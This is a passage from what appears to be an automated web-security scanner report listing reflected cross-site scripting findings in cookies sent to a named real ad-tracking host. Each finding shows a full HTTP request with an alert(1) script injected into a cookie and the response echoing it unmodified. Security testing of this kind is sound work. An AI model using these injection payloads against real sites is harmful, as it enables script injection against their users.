This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&f8562<script>alert(1)</script>3bed94fd4d2; ar_p84552060=exp=2&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:28:46 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; BMX_G=method->-1,ts->1309224495; BMX_3PC=1; UID=33da324b-72.246.30.136-1309224496; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224526

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:51:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=4&initExp=Tue Jun 28 01:28:15 2011&recExp=Tue Jun 28 01:51:56 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:51:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31911

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&f8562<script>alert(1)</script>3bed94fd4d2' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p104567837 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 1274e<script>alert(1)</script>58bcedea705 was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&1274e<script>alert(1)</script>58bcedea705; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:37 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
ay 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&1274e<script>alert(1)</script>58bcedea705', "ar_p97174789": 'exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&', "ar_p82806590": 'exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 2
...[SNIP]...

1.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p104939219 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p104939219 cookie is copied into the HTML document as plain text between tags. The payload 9c6bc<script>alert(1)</script>76b51c9b189 was submitted in the ar_p104939219 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&9c6bc<script>alert(1)</script>76b51c9b189; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:37 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "ar_p104939219": 'exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&9c6bc<script>alert(1)</script>76b51c9b189', "ar_p85001580": 'exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recE
...[SNIP]...

1.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload bc485<script>alert(1)</script>38a115ab94f was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&bc485<script>alert(1)</script>38a115ab94f; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:37 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
p=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&bc485<script>alert(1)</script>38a115ab94f', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "ar_p104939
...[SNIP]...

1.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 668b5<script>alert(1)</script>c9b553c43ac was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&668b5<script>alert(1)</script>c9b553c43ac; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:37 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p45555483": 'exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&668b5<script>alert(1)</script>c9b553c43ac', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://pho
...[SNIP]...

1.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload b70bc<script>alert(1)</script>25ff935992c was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84552060&PRAd=[_topp_placementid%]&AR_C=[_topp_adid%] HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&b70bc<script>alert(1)</script>25ff935992c; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; UID=4a757a7-24.143.206.42-1305663172; ar_p84552060=exp=2&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:17 2011&prad=2108455&arc=4476889&; BMX_G=method->-1,ts->1309224197; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84552060=exp=5&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:36 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; expires=Mon 26-Sep-2011 01:23:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31553

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"[_topp_placementid%]",Pid:"p84552060",Arc:"[_topp_ad
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&b70bc<script>alert(1)</script>25ff935992c', "UID": '4a757a7-24.143.206.42-1305663172', "ar_p104939219": 'exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&', "ar_p85001580": 'exp=1&initExp=Thu J
...[SNIP]...

1.429. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 317ae<script>alert(1)</script>84d04f88d13 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

